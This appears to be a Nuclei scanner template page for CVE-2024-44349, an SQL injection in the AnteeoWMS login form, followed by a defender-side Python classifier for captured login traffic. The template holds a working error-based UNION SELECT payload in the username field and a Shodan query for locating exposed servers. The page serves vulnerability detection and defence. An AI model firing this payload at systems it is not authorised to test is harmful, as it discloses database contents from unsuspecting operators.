AnteeoWMS < v4.7.34 - SQL Injection
ID: CVE-2024-44349
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,sqli,anteeowms
Description
A SQL injection vulnerability in the login portal of AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and to disclose some data from the underlying DB.
YAML Source
id: CVE-2024-44349

info:
  name: AnteeoWMS < v4.7.34 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.
  reference:
    - https://blog.cybergon.com/posts/cve-2024-44349/
    - http://nvd.nist.gov/vuln/detail/CVE-2024-44349
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-44349
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"ANTEEO"
  tags: cve,cve2024,sqli,anteeowms

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /default.aspx HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: viewstate
        internal: true
        group: 1
        regex:
          - 'id="__VIEWSTATE" value="([/a-zA-Z0-9+=]+?)"'

      - type: regex
        part: body
        name: viewstategen
        internal: true
        group: 1
        regex:
          - 'id="__VIEWSTATEGENERATOR" value="([A-Z0-9]+)"'

      - type: regex
        part: body
        name: eventval
        internal: true
        group: 1
        regex:
          - 'id="__EVENTVALIDATION" value="([/a-zA-Z0-9+=]+)"'

  - raw:
      - |
        POST /default.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Conversion failed when converting the nvarchar value 'Microsoft SQL Server"
# digest: 4b0a00483046022100abade118a9fc53251c341b7b1c9b2060dbbbcd2dd4d0548ce92d5dc5c0b879eb022100ae8e978f143984f8d212b2f8fe5941f689bceeafd139614eae6e68217c0fe356:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-44349.yaml"
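For defenders reviewing captured login traffic, the two conditions the template relies on (SQL syntax in the username field and the SQL Server conversion error in the response) can be checked offline. This is an added example, not part of the template or the Nuclei project; the function names, token list and sample data are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Username field and error text, both taken from the template above.
LOGIN_FIELD = "ctl00$MainContentPlaceHolder$ASPxCallbackPanel$UsrAuthLogin"
ERROR_MARKER = "Conversion failed when converting the nvarchar value 'Microsoft SQL Server"

# Heuristic tokens that do not belong in a username (assumption: tune per site).
SQLI_PATTERNS = {
    "quote": re.compile(r"'"),
    "union-select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "tsql-global": re.compile(r"@@\w+"),
    "comment": re.compile(r"--|/\*"),
    "cast-convert": re.compile(r"\b(?:cast|convert)\s*\(", re.I),
}

def suspicious_login(body):
    """Names of the patterns that fire on the URL-decoded username field."""
    fields = parse_qs(body, keep_blank_values=True)
    value = " ".join(fields.get(LOGIN_FIELD, []))
    return [name for name, rx in SQLI_PATTERNS.items() if rx.search(value)]

def classify(request_body, response_body):
    """Label one captured login exchange (request body, response body)."""
    hits = suspicious_login(request_body)
    # Require two or more tokens: a lone apostrophe (O'Brien) is not enough to alert.
    attempt = len(hits) >= 2
    leaked = ERROR_MARKER in response_body
    if attempt and leaked:
        return "confirmed"    # SQL syntax sent and the database error was echoed back
    if attempt:
        return "attempt"      # patched, blocked, or error output suppressed
    if leaked:
        return "error-leak"   # verbose SQL errors exposed; worth fixing regardless
    return "clean"

# Constructed samples; request bodies are trimmed to the relevant field.
FIELD = "ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin"
PROBE = FIELD + "=aa'union%20select+cast(@@version%20as%20int),null,null--%20-"
BENIGN = FIELD + "=o%27brien"
ERROR_PAGE = ("Conversion failed when converting the nvarchar value "
              "'Microsoft SQL Server (constructed)' to data type int.")
OK_PAGE = "<html>Invalid login</html>"

if __name__ == "__main__":
    for req, resp in [(PROBE, ERROR_PAGE), (PROBE, OK_PAGE), (BENIGN, OK_PAGE)]:
        print(classify(req, resp), suspicious_login(req))
```

An "error-leak" result on its own indicates that verbose database errors reach the client, which is what makes this error-based check possible in the first place.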